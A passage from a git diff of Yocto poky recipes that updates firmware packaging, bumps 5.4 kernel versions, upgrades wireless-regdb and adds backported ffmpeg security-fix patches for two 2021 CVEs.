"${PN}-iwlwifi-license" +RDEPENDS_${PN}-iwlwifi-9000 = "${PN}-iwlwifi-license" +RDEPENDS_${PN}-iwlwifi-misc = "${PN}-iwlwifi-license" + +# -iwlwifi-misc is a "catch all" package that includes all the iwlwifi +# firmwares that are not already included in other -iwlwifi- packages. +# -iwlwifi is a virtual package that depends upon all iwlwifi packages. +# These are distinct in order to allow the -misc firmwares to be installed +# without pulling in every other iwlwifi package. +ALLOW_EMPTY_${PN}-iwlwifi = "1" +ALLOW_EMPTY_${PN}-iwlwifi-misc = "1" + +# Handle package updating for the newly merged iwlwifi groupings +RPROVIDES_${PN}-iwlwifi-7265 = "${PN}-iwlwifi-7265-8 ${PN}-iwlwifi-7265-9" +RREPLACES_${PN}-iwlwifi-7265 = "${PN}-iwlwifi-7265-8 ${PN}-iwlwifi-7265-9" +RCONFLICTS_${PN}-iwlwifi-7265 = "${PN}-iwlwifi-7265-8 ${PN}-iwlwifi-7265-9" + +RPROVIDES_${PN}-iwlwifi-7260 = "${PN}-iwlwifi-7260-7 ${PN}-iwlwifi-7260-8 ${PN}-iwlwifi-7260-9" +RREPLACES_${PN}-iwlwifi-7260 = "${PN}-iwlwifi-7260-7 ${PN}-iwlwifi-7260-8 ${PN}-iwlwifi-7260-9" +RCONFLICTS_${PN}-iwlwifi-7260 = "${PN}-iwlwifi-7260-7 ${PN}-iwlwifi-7260-8 ${PN}-iwlwifi-7260-9" + +# For ibt +LICENSE_${PN}-ibt-license = "Firmware-ibt_firmware" +LICENSE_${PN}-ibt-hw-37-7 = "Firmware-ibt_firmware" +LICENSE_${PN}-ibt-hw-37-8 = "Firmware-ibt_firmware" +LICENSE_${PN}-ibt-11-5 = "Firmware-ibt_firmware" +LICENSE_${PN}-ibt-12-16 = "Firmware-ibt_firmware" +LICENSE_${PN}-ibt-17 = "Firmware-ibt_firmware" +LICENSE_${PN}-ibt-20 = "Firmware-ibt_firmware" +LICENSE_${PN}-ibt-misc = "Firmware-ibt_firmware" + +FILES_${PN}-ibt-license = "${nonarch_base_libdir}/firmware/LICENCE.ibt_firmware" +FILES_${PN}-ibt-hw-37-7 = "${nonarch_base_libdir}/firmware/intel/ibt-hw-37.7*.bseq" +FILES_${PN}-ibt-hw-37-8 = "${nonarch_base_libdir}/firmware/intel/ibt-hw-37.8*.bseq" +FILES_${PN}-ibt-11-5 = "${nonarch_base_libdir}/firmware/intel/ibt-11-5.sfi ${nonarch_base_libdir}/firmware/intel/ibt-11-5.ddc" +FILES_${PN}-ibt-12-16 = "${nonarch_base_libdir}/firmware/intel/ibt-12-16.sfi ${nonarch_base_libdir}/firmware/intel/ibt-12-16.ddc" +FILES_${PN}-ibt-17 = "${nonarch_base_libdir}/firmware/intel/ibt-17-*.sfi ${nonarch_base_libdir}/firmware/intel/ibt-17-*.ddc" +FILES_${PN}-ibt-20 = "${nonarch_base_libdir}/firmware/intel/ibt-20-*.sfi ${nonarch_base_libdir}/firmware/intel/ibt-20-*.ddc" +FILES_${PN}-ibt-misc = "${nonarch_base_libdir}/firmware/intel/ibt-*" + +RDEPENDS_${PN}-ibt-hw-37-7 = "${PN}-ibt-license" +RDEPENDS_${PN}-ibt-hw-37.8 = "${PN}-ibt-license" +RDEPENDS_${PN}-ibt-11-5 = "${PN}-ibt-license" +RDEPENDS_${PN}-ibt-12-16 = "${PN}-ibt-license" +RDEPENDS_${PN}-ibt-17 = "${PN}-ibt-license" +RDEPENDS_${PN}-ibt-20 = "${PN}-ibt-license" +RDEPENDS_${PN}-ibt-misc = "${PN}-ibt-license" + +ALLOW_EMPTY_${PN}-ibt= "1" +ALLOW_EMPTY_${PN}-ibt-misc = "1" + +LICENSE_${PN}-i915 = "Firmware-i915" +LICENSE_${PN}-i915-license = "Firmware-i915" +FILES_${PN}-i915-license = "${nonarch_base_libdir}/firmware/LICENSE.i915" +FILES_${PN}-i915 = "${nonarch_base_libdir}/firmware/i915" +RDEPENDS_${PN}-i915 = "${PN}-i915-license" + +LICENSE_${PN}-ice = "Firmware-ice" +LICENSE_${PN}-ice-license = "Firmware-ice" +FILES_${PN}-ice-license = "${nonarch_base_libdir}/firmware/LICENSE.ice" +FILES_${PN}-ice = "${nonarch_base_libdir}/firmware/intel/ice" +RDEPENDS_${PN}-ice = "${PN}-ice-license" + +FILES_${PN}-adsp-sst-license = "${nonarch_base_libdir}/firmware/LICENCE.adsp_sst" +LICENSE_${PN}-adsp-sst = "Firmware-adsp_sst" +LICENSE_${PN}-adsp-sst-license = "Firmware-adsp_sst" +FILES_${PN}-adsp-sst = "${nonarch_base_libdir}/firmware/intel/dsp_fw*" +RDEPENDS_${PN}-adsp-sst = "${PN}-adsp-sst-license" + +# For QAT +LICENSE_${PN}-qat = "Firmware-qat" +LICENSE_${PN}-qat-license = "Firmware-qat" +FILES_${PN}-qat-license = "${nonarch_base_libdir}/firmware/LICENCE.qat_firmware" +FILES_${PN}-qat = "${nonarch_base_libdir}/firmware/qat*.bin" +RDEPENDS_${PN}-qat = "${PN}-qat-license" + +# For QCOM VPU/GPU and SDM845 +LICENSE_${PN}-qcom-license = "Firmware-qcom" +FILES_${PN}-qcom-license = "${nonarch_base_libdir}/firmware/LICENSE.qcom ${nonarch_base_libdir}/firmware/qcom/NOTICE.txt" +FILES_${PN}-qcom-venus-1.8 = "${nonarch_base_libdir}/firmware/qcom/venus-1.8/*" +FILES_${PN}-qcom-venus-4.2 = "${nonarch_base_libdir}/firmware/qcom/venus-4.2/*" +FILES_${PN}-qcom-venus-5.2 = "${nonarch_base_libdir}/firmware/qcom/venus-5.2/*" +FILES_${PN}-qcom-venus-5.4 = "${nonarch_base_libdir}/firmware/qcom/venus-5.4/*" +FILES_${PN}-qcom-vpu-1.0 = "${nonarch_base_libdir}/firmware/qcom/vpu-1.0/*" +FILES_${PN}-qcom-vpu-2.0 = "${nonarch_base_libdir}/firmware/qcom/vpu-2.0/*" +FILES_${PN}-qcom-adreno-a3xx = "${nonarch_base_libdir}/firmware/qcom/a300_*.fw ${nonarch_base_libdir}/firmware/a300_*.fw" +FILES_${PN}-qcom-adreno-a530 = "${nonarch_base_libdir}/firmware/qcom/a530*.*" +FILES_${PN}-qcom-adreno-a630 = "${nonarch_base_libdir}/firmware/qcom/a630*.* ${nonarch_base_libdir}/firmware/qcom/sdm845/a630*.*" +FILES_${PN}-qcom-adreno-a650 = "${nonarch_base_libdir}/firmware/qcom/a650*.* ${nonarch_base_libdir}/firmware/qcom/sm8250/a650*.*" +FILES_${PN}-qcom-adreno-a660 = "${nonarch_base_libdir}/firmware/qcom/a660*.*" +FILES_${PN}-qcom-sdm845-audio = "${nonarch_base_libdir}/firmware/qcom/sdm845/adsp*.*" +FILES_${PN}-qcom-sdm845-compute = "${nonarch_base_libdir}/firmware/qcom/sdm845/cdsp*.*" +FILES_${PN}-qcom-sdm845-modem = "${nonarch_base_libdir}/firmware/qcom/sdm845/mba.mbn ${nonarch_base_libdir}/firmware/qcom/sdm845/modem*.* ${nonarch_base_libdir}/firmware/qcom/sdm845/wlanmdsp.mbn" +FILES_${PN}-qcom-sm8250-audio = "${nonarch_base_libdir}/firmware/qcom/sm8250/adsp*.*" +FILES_${PN}-qcom-sm8250-compute = "${nonarch_base_libdir}/firmware/qcom/sm8250/cdsp*.*" +RDEPENDS_${PN}-qcom-venus-1.8 = "${PN}-qcom-license" +RDEPENDS_${PN}-qcom-venus-4.2 = "${PN}-qcom-license" +RDEPENDS_${PN}-qcom-venus-5.2 = "${PN}-qcom-license" +RDEPENDS_${PN}-qcom-venus-5.4 = "${PN}-qcom-license" +RDEPENDS_${PN}-qcom-vpu-1.0 = "${PN}-qcom-license" +RDEPENDS_${PN}-qcom-vpu-2.0 = "${PN}-qcom-license" +RDEPENDS_${PN}-qcom-adreno-a3xx = "${PN}-qcom-license" +RDEPENDS_${PN}-qcom-adreno-a530 = "${PN}-qcom-license" +RDEPENDS_${PN}-qcom-adreno-a630 = "${PN}-qcom-license" +RDEPENDS_${PN}-qcom-adreno-a650 = "${PN}-qcom-license" +RDEPENDS_${PN}-qcom-adreno-a660 = "${PN}-qcom-license" +RDEPENDS_${PN}-qcom-sdm845-audio = "${PN}-qcom-license" +RDEPENDS_${PN}-qcom-sdm845-compute = "${PN}-qcom-license" +RDEPENDS_${PN}-qcom-sdm845-modem = "${PN}-qcom-license" +RDEPENDS_${PN}-qcom-sm8250-audio = "${PN}-qcom-license" +RDEPENDS_${PN}-qcom-sm8250-compute = "${PN}-qcom-license" + +FILES_${PN}-liquidio = "${nonarch_base_libdir}/firmware/liquidio" + +# For Amlogic VDEC +LICENSE_${PN}-amlogic-vdec = "Firmware-amlogic_vdec" +FILES_${PN}-amlogic-vdec-license = "${nonarch_base_libdir}/firmware/LICENSE.amlogic_vdec" +FILES_${PN}-amlogic-vdec = "${nonarch_base_libdir}/firmware/meson/vdec/*" +RDEPENDS_${PN}-amlogic-vdec = "${PN}-amlogic-vdec-license" + +# For other firmwares +# Maybe split out to separate packages when needed. +LICENSE_${PN} = "\ + Firmware-Abilis \ + & Firmware-agere \ + & Firmware-amdgpu \ + & Firmware-amd-ucode \ + & Firmware-amlogic_vdec \ + & Firmware-atmel \ + & Firmware-ca0132 \ + & Firmware-cavium \ + & Firmware-chelsio_firmware \ + & Firmware-cw1200 \ + & Firmware-dib0700 \ + & Firmware-e100 \ + & Firmware-ene_firmware \ + & Firmware-fw_sst_0f28 \ + & Firmware-go7007 \ + & Firmware-hfi1_firmware \ + & Firmware-i2400m \ + & Firmware-ibt_firmware \ + & Firmware-it913x \ + & Firmware-IntcSST2 \ + & Firmware-kaweth \ + & Firmware-moxa \ + & Firmware-myri10ge_firmware \ + & Firmware-nvidia \ + & Firmware-OLPC \ + & Firmware-ath9k-htc \ + & Firmware-phanfw \ + & Firmware-qat \ + & Firmware-qcom \ + & Firmware-qla1280 \ + & Firmware-qla2xxx \ + & Firmware-r8a779x_usb3 \ + & Firmware-radeon \ + & Firmware-ralink_a_mediatek_company_firmware \ + & Firmware-ralink-firmware \ + & Firmware-imx-sdma_firmware \ + & Firmware-siano \ + & Firmware-tda7706-firmware \ + & Firmware-ti-connectivity \ + & Firmware-ti-keystone \ + & Firmware-ueagle-atm4-firmware \ + & Firmware-wl1251 \ + & Firmware-xc4000 \ + & Firmware-xc5000 \ + & Firmware-xc5000c \ + & WHENCE \ +" + +FILES_${PN}-license += "${nonarch_base_libdir}/firmware/LICEN*" +FILES_${PN} += "${nonarch_base_libdir}/firmware/*" +RDEPENDS_${PN} += "${PN}-license" +RDEPENDS_${PN} += "${PN}-whence-license" + +# Make linux-firmware depend on all of the split-out packages. +# Make linux-firmware-iwlwifi depend on all of the split-out iwlwifi packages. +# Make linux-firmware-ibt depend on all of the split-out ibt packages. +python populate_packages_prepend () { + firmware_pkgs = oe.utils.packages_filter_out_system(d) + d.appendVar('RRECOMMENDS_linux-firmware', ' ' + ' '.join(firmware_pkgs)) + + iwlwifi_pkgs = filter(lambda x: x.find('-iwlwifi-') != -1, firmware_pkgs) + d.appendVar('RRECOMMENDS_linux-firmware-iwlwifi', ' ' + ' '.join(iwlwifi_pkgs)) + + ibt_pkgs = filter(lambda x: x.find('-ibt-') != -1, firmware_pkgs) + d.appendVar('RRECOMMENDS_linux-firmware-ibt', ' ' + ' '.join(ibt_pkgs)) +} + +# Firmware files are generally not ran on the CPU, so they can be +# allarch despite being architecture specific +INSANE_SKIP = "arch" diff --git a/poky/meta/recipes-kernel/linux/linux-yocto-rt_5.4.bb b/poky/meta/recipes-kernel/linux/linux-yocto-rt_5.4.bb index 53e6982619..9e8281c7a1 100644 --- a/poky/meta/recipes-kernel/linux/linux-yocto-rt_5.4.bb +++ b/poky/meta/recipes-kernel/linux/linux-yocto-rt_5.4.bb @@ -11,13 +11,13 @@ python () { raise bb.parse.SkipRecipe("Set PREFERRED_PROVIDER_virtual/kernel to linux-yocto-rt to enable it") } -SRCREV_machine ?= "e823f31a48749bf1d01a86c274fcec87fae1e5ba" -SRCREV_meta ?= "71f799f448d405a35d88ecee0aba3ec2b198d542" +SRCREV_machine ?= "e92d76afe6d8592917c0e7b948912c085e661df2" +SRCREV_meta ?= "98cce1c95fcc9a26965cbc5f038fd71d53c387c8" SRC_URI = "git://git.yoctoproject.org/linux-yocto.git;branch=${KBRANCH};name=machine \ git://git.yoctoproject.org/yocto-kernel-cache;type=kmeta;name=meta;branch=yocto-5.4;destsuffix=${KMETA}" -LINUX_VERSION ?= "5.4.141" +LINUX_VERSION ?= "5.4.172" LIC_FILES_CHKSUM = "file://COPYING;md5=bbea815ee2795b2f4230826c0c6b8814" diff --git a/poky/meta/recipes-kernel/linux/linux-yocto-tiny_5.4.bb b/poky/meta/recipes-kernel/linux/linux-yocto-tiny_5.4.bb index 44a033d5cb..a75570df93 100644 --- a/poky/meta/recipes-kernel/linux/linux-yocto-tiny_5.4.bb +++ b/poky/meta/recipes-kernel/linux/linux-yocto-tiny_5.4.bb @@ -6,7 +6,7 @@ KCONFIG_MODE = "--allnoconfig" require recipes-kernel/linux/linux-yocto.inc -LINUX_VERSION ?= "5.4.141" +LINUX_VERSION ?= "5.4.172" LIC_FILES_CHKSUM = "file://COPYING;md5=bbea815ee2795b2f4230826c0c6b8814" DEPENDS += "${@bb.utils.contains('ARCH', 'x86', 'elfutils-native', '', d)}" @@ -15,9 +15,9 @@ DEPENDS += "openssl-native util-linux-native" KMETA = "kernel-meta" KCONF_BSP_AUDIT_LEVEL = "2" -SRCREV_machine_qemuarm ?= "63d08f6ee3425e9d94eccf3a75a9ec4e474df916" -SRCREV_machine ?= "05b2de44f781a297be454242d77f619189dfc6f4" -SRCREV_meta ?= "71f799f448d405a35d88ecee0aba3ec2b198d542" +SRCREV_machine_qemuarm ?= "10b4756eee78aa43ff9ed64da700ec6e8d97ff22" +SRCREV_machine ?= "6ab93fdc53b64e146e4f16363375c1beb37b82e4" +SRCREV_meta ?= "98cce1c95fcc9a26965cbc5f038fd71d53c387c8" PV = "${LINUX_VERSION}+git${SRCPV}" diff --git a/poky/meta/recipes-kernel/linux/linux-yocto_5.4.bb b/poky/meta/recipes-kernel/linux/linux-yocto_5.4.bb index 0e41d734df..2d7f7559e5 100644 --- a/poky/meta/recipes-kernel/linux/linux-yocto_5.4.bb +++ b/poky/meta/recipes-kernel/linux/linux-yocto_5.4.bb @@ -12,16 +12,16 @@ KBRANCH_qemux86 ?= "v5.4/standard/base" KBRANCH_qemux86-64 ?= "v5.4/standard/base" KBRANCH_qemumips64 ?= "v5.4/standard/mti-malta64" -SRCREV_machine_qemuarm ?= "91a35a54a7b2d4d558b3f8b24c39657a3ff71c7c" -SRCREV_machine_qemuarm64 ?= "a8edc7f1b004c6fb56d142fba3e688ba2a051b54" -SRCREV_machine_qemumips ?= "4f1c4fc19e8d2cb994dac34fb8bb32a7c776b318" -SRCREV_machine_qemuppc ?= "7bb64db24c2b7bd2b6656036009bd71618eb125d" -SRCREV_machine_qemuriscv64 ?= "13fa9f66484db2492ee09667f45ad3e52e5b35ac" -SRCREV_machine_qemux86 ?= "13fa9f66484db2492ee09667f45ad3e52e5b35ac" -SRCREV_machine_qemux86-64 ?= "13fa9f66484db2492ee09667f45ad3e52e5b35ac" -SRCREV_machine_qemumips64 ?= "931ad0c17451151dd3ddfb27dc2e33965f90ce86" -SRCREV_machine ?= "13fa9f66484db2492ee09667f45ad3e52e5b35ac" -SRCREV_meta ?= "71f799f448d405a35d88ecee0aba3ec2b198d542" +SRCREV_machine_qemuarm ?= "8de1da3dc354dedef2e435e694eec6d6e72c9822" +SRCREV_machine_qemuarm64 ?= "eed7c0a64f3a7a91a130bc2e507304dc8b446a31" +SRCREV_machine_qemumips ?= "996a9660e4fab70db5cecec9c831141cd03c3d36" +SRCREV_machine_qemuppc ?= "0197cf5754b1bd4eb035c342af9cc27e8c3339ca" +SRCREV_machine_qemuriscv64 ?= "c6b015510134942076c0e111e56357656acf3dd5" +SRCREV_machine_qemux86 ?= "c6b015510134942076c0e111e56357656acf3dd5" +SRCREV_machine_qemux86-64 ?= "c6b015510134942076c0e111e56357656acf3dd5" +SRCREV_machine_qemumips64 ?= "fe2769a7c268ed224ec70fd2aaab850e4eef70dc" +SRCREV_machine ?= "c6b015510134942076c0e111e56357656acf3dd5" +SRCREV_meta ?= "98cce1c95fcc9a26965cbc5f038fd71d53c387c8" # remap qemuarm to qemuarma15 for the 5.4 kernel # KMACHINE_qemuarm ?= "qemuarma15" @@ -30,7 +30,7 @@ SRC_URI = "git://git.yoctoproject.org/linux-yocto.git;name=machine;branch=${KBRA git://git.yoctoproject.org/yocto-kernel-cache;type=kmeta;name=meta;branch=yocto-5.4;destsuffix=${KMETA}" LIC_FILES_CHKSUM = "file://COPYING;md5=bbea815ee2795b2f4230826c0c6b8814" -LINUX_VERSION ?= "5.4.141" +LINUX_VERSION ?= "5.4.172" DEPENDS += "${@bb.utils.contains('ARCH', 'x86', 'elfutils-native', '', d)}" DEPENDS += "openssl-native util-linux-native" diff --git a/poky/meta/recipes-kernel/lttng/lttng-modules_2.11.6.bb b/poky/meta/recipes-kernel/lttng/lttng-modules_2.11.6.bb index 3fdc8094e9..3145f0298c 100644 --- a/poky/meta/recipes-kernel/lttng/lttng-modules_2.11.6.bb +++ b/poky/meta/recipes-kernel/lttng/lttng-modules_2.11.6.bb @@ -39,7 +39,9 @@ EXTRA_OEMAKE += "KERNELDIR='${STAGING_KERNEL_DIR}'" do_install_append() { # Delete empty directories to avoid QA failures if no modules were built - find ${D}/${nonarch_base_libdir} -depth -type d -empty -exec rmdir {} \; + if [ -d ${D}/${nonarch_base_libdir} ]; then + find ${D}/${nonarch_base_libdir} -depth -type d -empty -exec rmdir {} \; + fi } python do_package_prepend() { diff --git a/poky/meta/recipes-kernel/lttng/lttng-tools_2.11.5.bb b/poky/meta/recipes-kernel/lttng/lttng-tools_2.11.5.bb index e830475d0d..6306193809 100644 --- a/poky/meta/recipes-kernel/lttng/lttng-tools_2.11.5.bb +++ b/poky/meta/recipes-kernel/lttng/lttng-tools_2.11.5.bb @@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=01d7fc4496aacf37d90df90b90b0cac1 \ file://gpl-2.0.txt;md5=b234ee4d69f5fce4486a80fdaf4a4263 \ file://lgpl-2.1.txt;md5=0f0d71500e6a57fd24d825f33242b9ca" -DEPENDS = "liburcu popt libxml2 util-linux" +DEPENDS = "liburcu popt libxml2 util-linux bison-native" RDEPENDS_${PN} = "libgcc" RDEPENDS_${PN}-ptest += "make perl bash gawk babeltrace procps perl-module-overloading coreutils util-linux kmod lttng-modules sed python3-core" RDEPENDS_${PN}-ptest_append_libc-glibc = " glibc-utils" diff --git a/poky/meta/recipes-kernel/make-mod-scripts/make-mod-scripts_1.0.bb b/poky/meta/recipes-kernel/make-mod-scripts/make-mod-scripts_1.0.bb index b58fa9a603..f9df345ca5 100644 --- a/poky/meta/recipes-kernel/make-mod-scripts/make-mod-scripts_1.0.bb +++ b/poky/meta/recipes-kernel/make-mod-scripts/make-mod-scripts_1.0.bb @@ -19,7 +19,7 @@ DEPENDS += "bc-native bison-native" DEPENDS += "gmp-native" EXTRA_OEMAKE = " HOSTCC="${BUILD_CC} ${BUILD_CFLAGS} ${BUILD_LDFLAGS}" HOSTCPP="${BUILD_CPP}"" -EXTRA_OEMAKE += " HOSTCXX="${BUILD_CXX} ${BUILD_CXXFLAGS} ${BUILD_LDFLAGS}"" +EXTRA_OEMAKE += " HOSTCXX="${BUILD_CXX} ${BUILD_CXXFLAGS} ${BUILD_LDFLAGS}" CROSS_COMPILE=${TARGET_PREFIX}" # Build some host tools under work-shared. CC, LD, and AR are probably # not used, but this is the historical way of invoking "make scripts". diff --git a/poky/meta/recipes-kernel/powertop/powertop_2.10.bb b/poky/meta/recipes-kernel/powertop/powertop_2.10.bb index ffa3b4685c..dcbba2fd5c 100644 --- a/poky/meta/recipes-kernel/powertop/powertop_2.10.bb +++ b/poky/meta/recipes-kernel/powertop/powertop_2.10.bb @@ -6,7 +6,7 @@ DEPENDS = "ncurses libnl pciutils autoconf-archive" LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=12f884d2ae1ff87c09e5b7ccc2c4ca7e" -SRC_URI = "git://github.com/fenrus75/powertop;protocol=https \ +SRC_URI = "git://github.com/fenrus75/powertop;protocol=https;branch=master \ file://0001-wakeup_xxx.h-include-limits.h.patch \ file://0002-configure.ac-ax_add_fortify_source.patch \ file://0003-configure-Use-AX_REQUIRE_DEFINED.patch \ diff --git a/poky/meta/recipes-kernel/systemtap/systemtap_git.inc b/poky/meta/recipes-kernel/systemtap/systemtap_git.inc index 116e83fe0f..af55f15fd4 100644 --- a/poky/meta/recipes-kernel/systemtap/systemtap_git.inc +++ b/poky/meta/recipes-kernel/systemtap/systemtap_git.inc @@ -3,7 +3,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" SRCREV = "044a0640985ef007c0b2fb6eaf660d9d51800cda" PV = "4.2" -SRC_URI = "git://sourceware.org/git/systemtap.git \ +SRC_URI = "git://sourceware.org/git/systemtap.git;branch=master \ file://0001-Do-not-let-configure-write-a-python-location-into-th.patch \ file://0001-Install-python-modules-to-correct-library-dir.patch \ file://0001-staprun-stapbpf-don-t-support-installing-a-non-root.patch \ diff --git a/poky/meta/recipes-kernel/wireless-regdb/wireless-regdb_2021.04.21.bb b/poky/meta/recipes-kernel/wireless-regdb/wireless-regdb_2021.04.21.bb deleted file mode 100644 index f79c0b29ea..0000000000 --- a/poky/meta/recipes-kernel/wireless-regdb/wireless-regdb_2021.04.21.bb +++ /dev/null @@ -1,43 +0,0 @@ -SUMMARY = "Wireless Central Regulatory Domain Database" -HOMEPAGE = "https://wireless.wiki.kernel.org/en/developers/regulatory/crda" -SECTION = "net" -LICENSE = "ISC" -LIC_FILES_CHKSUM = "file://LICENSE;md5=07c4f6dea3845b02a18dc00c8c87699c" - -SRC_URI = "https://www.kernel.org/pub/software/network/${BPN}/${BP}.tar.xz" -SRC_URI[sha256sum] = "9e4c02b2a9710df4dbdb327c39612e8cbbae6495987afeddaebab28c1ea3d8fa" - -inherit bin_package allarch - -do_install() { - install -d -m0755 ${D}${nonarch_libdir}/crda - install -d -m0755 ${D}${sysconfdir}/wireless-regdb/pubkeys - install -m 0644 regulatory.bin ${D}${nonarch_libdir}/crda/regulatory.bin - install -m 0644 sforshee.key.pub.pem ${D}${sysconfdir}/wireless-regdb/pubkeys/sforshee.key.pub.pem - - install -m 0644 -D regulatory.db ${D}${nonarch_base_libdir}/firmware/regulatory.db - install -m 0644 regulatory.db.p7s ${D}${nonarch_base_libdir}/firmware/regulatory.db.p7s -} - -# Install static regulatory DB in /lib/firmware for kernel to load. -# This requires Linux kernel >= v4.15. -# For kernel <= v4.14, inherit the kernel_wireless_regdb.bbclass -# (in meta-networking) in kernel's recipe. -PACKAGES = "${PN}-static ${PN}" -RCONFLICTS_${PN} = "${PN}-static" - -FILES_${PN}-static = " \ - ${nonarch_base_libdir}/firmware/regulatory.db \ - ${nonarch_base_libdir}/firmware/regulatory.db.p7s \ -" - -# Native users might want to use the source of regulatory DB. -# This is for example used by Linux kernel <= v4.14 and -# kernel_wireless_regdb.bbclass in meta-networking. -do_install_append_class-native() { - install -m 0644 -D db.txt ${D}${libdir}/crda/db.txt -} - -RSUGGESTS_${PN} = "crda" - -BBCLASSEXTEND = "native" diff --git a/poky/meta/recipes-kernel/wireless-regdb/wireless-regdb_2021.08.28.bb b/poky/meta/recipes-kernel/wireless-regdb/wireless-regdb_2021.08.28.bb new file mode 100644 index 0000000000..376311804e --- /dev/null +++ b/poky/meta/recipes-kernel/wireless-regdb/wireless-regdb_2021.08.28.bb @@ -0,0 +1,43 @@ +SUMMARY = "Wireless Central Regulatory Domain Database" +HOMEPAGE = "https://wireless.wiki.kernel.org/en/developers/regulatory/crda" +SECTION = "net" +LICENSE = "ISC" +LIC_FILES_CHKSUM = "file://LICENSE;md5=07c4f6dea3845b02a18dc00c8c87699c" + +SRC_URI = "https://www.kernel.org/pub/software/network/${BPN}/${BP}.tar.xz" +SRC_URI[sha256sum] = "cff370c410d1e6d316ae0a7fa8ac6278fdf1efca5d3d664aca7cfd2aafa54446" + +inherit bin_package allarch + +do_install() { + install -d -m0755 ${D}${nonarch_libdir}/crda + install -d -m0755 ${D}${sysconfdir}/wireless-regdb/pubkeys + install -m 0644 regulatory.bin ${D}${nonarch_libdir}/crda/regulatory.bin + install -m 0644 sforshee.key.pub.pem ${D}${sysconfdir}/wireless-regdb/pubkeys/sforshee.key.pub.pem + + install -m 0644 -D regulatory.db ${D}${nonarch_base_libdir}/firmware/regulatory.db + install -m 0644 regulatory.db.p7s ${D}${nonarch_base_libdir}/firmware/regulatory.db.p7s +} + +# Install static regulatory DB in /lib/firmware for kernel to load. +# This requires Linux kernel >= v4.15. +# For kernel <= v4.14, inherit the kernel_wireless_regdb.bbclass +# (in meta-networking) in kernel's recipe. +PACKAGES = "${PN}-static ${PN}" +RCONFLICTS_${PN} = "${PN}-static" + +FILES_${PN}-static = " \ + ${nonarch_base_libdir}/firmware/regulatory.db \ + ${nonarch_base_libdir}/firmware/regulatory.db.p7s \ +" + +# Native users might want to use the source of regulatory DB. +# This is for example used by Linux kernel <= v4.14 and +# kernel_wireless_regdb.bbclass in meta-networking. +do_install_append_class-native() { + install -m 0644 -D db.txt ${D}${libdir}/crda/db.txt +} + +RSUGGESTS_${PN} = "crda" + +BBCLASSEXTEND = "native" diff --git a/poky/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-3566.patch b/poky/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-3566.patch new file mode 100644 index 0000000000..abfc024820 --- /dev/null +++ b/poky/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-3566.patch @@ -0,0 +1,61 @@ +From 3bce9e9b3ea35c54bacccc793d7da99ea5157532 Mon Sep 17 00:00:00 2001 +From: Paul B Mahol +Date: Mon, 27 Jan 2020 21:53:08 +0100 +Subject: [PATCH] avformat/tty: add probe function + +CVE: CVE-2021-3566 +Signed-off-by: Saloni Jain + +Upstream-Status: Backport [http://git.videolan.org/?p=ffmpeg.git;a=patch;h=3bce9e9b3ea35c54bacccc793d7da99ea5157532] +Comment: No changes/refreshing done. +--- + libavformat/tty.c | 21 ++++++++++++++++++++- + 1 file changed, 20 insertions(+), 1 deletion(-) + +diff --git a/libavformat/tty.c b/libavformat/tty.c +index 8d48f2c45c12..60f7e9f87ee7 100644 +--- a/libavformat/tty.c ++++ b/libavformat/tty.c +@@ -34,6 +34,13 @@ + #include "internal.h" + #include "sauce.h" + ++static int isansicode(int x) ++{ ++ return x == 0x1B || x == 0x0A || x == 0x0D || (x >= 0x20 && x < 0x7f); ++} ++ ++static const char tty_extensions[31] = "ans,art,asc,diz,ice,nfo,txt,vt"; ++ + typedef struct TtyDemuxContext { + AVClass *class; + int chars_per_frame; +@@ -42,6 +49,17 @@ typedef struct TtyDemuxContext { + AVRational framerate; /**< Set by a private option. */ + } TtyDemuxContext; + ++static int read_probe(const AVProbeData *p) ++{ ++ int cnt = 0; ++ ++ for (int i = 0; i < p->buf_size; i++) ++ cnt += !!isansicode(p->buf[i]); ++ ++ return (cnt * 100LL / p->buf_size) * (cnt > 400) * ++ !!av_match_ext(p->filename, tty_extensions); ++} ++ + /** + * Parse EFI header + */ +@@ -153,8 +171,9 @@ AVInputFormat ff_tty_demuxer = { + .name = "tty", + .long_name = NULL_IF_CONFIG_SMALL("Tele-typewriter"), + .priv_data_size = sizeof(TtyDemuxContext), ++ .read_probe = read_probe, + .read_header = read_header, + .read_packet = read_packet, +- .extensions = "ans,art,asc,diz,ice,nfo,txt,vt", ++ .extensions = tty_extensions, + .priv_class = &tty_demuxer_class, + }; diff --git a/poky/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-38291.patch b/poky/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-38291.patch new file mode 100644 index 0000000000..e5be985fc3 --- /dev/null +++ b/poky/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-38291.patch @@ -0,0 +1,53 @@ +From e01d306c647b5827102260b885faa223b646d2d1 Mon Sep 17 00:00:00 2001 +From: James Almer +Date: Wed, 21 Jul 2021 01:02:44 -0300 +Subject: [PATCH] avcodec/utils: don't return negative values in + av_get_audio_frame_duration() + +In some extrme cases, like with adpcm_ms samples with an extremely high channel +count, get_audio_frame_duration() may return a negative frame duration value. +Don't propagate it, and instead return 0, signaling that a duration could not +be determined. + +CVE: CVE-2021-3566 +Fixes ticket #9312 +Signed-off-by: James Almer +Signed-off-by: Saloni Jain + +Upstream-Status: Backport [http://git.videolan.org/?p=ffmpeg.git;a=patch;h=e01d306c647b5827102260b885faa223b646d2d1] +Comment: No changes/refreshing done. +--- + libavcodec/utils.c | 6 ++++-- + 1 file changed, 4 insertions(+), 2 deletions(-) + +diff --git a/libavcodec/utils.c b/libavcodec/utils.c +index 5fad782f5a..cfc07cbcb8 100644 +--- a/libavcodec/utils.c ++++ b/libavcodec/utils.c +@@ -810,20 +810,22 @@ static int get_audio_frame_duration(enum AVCodecID id, int sr, int ch, int ba, + + int av_get_audio_frame_duration(AVCodecContext *avctx, int frame_bytes) + { +- return get_audio_frame_duration(avctx->codec_id, avctx->sample_rate, ++ int duration = get_audio_frame_duration(avctx->codec_id, avctx->sample_rate, + avctx->channels, avctx->block_align, + avctx->codec_tag, avctx->bits_per_coded_sample, + avctx->bit_rate, avctx->extradata, avctx->frame_size, + frame_bytes); ++ return FFMAX(0, duration); + } + + int av_get_audio_frame_duration2(AVCodecParameters *par, 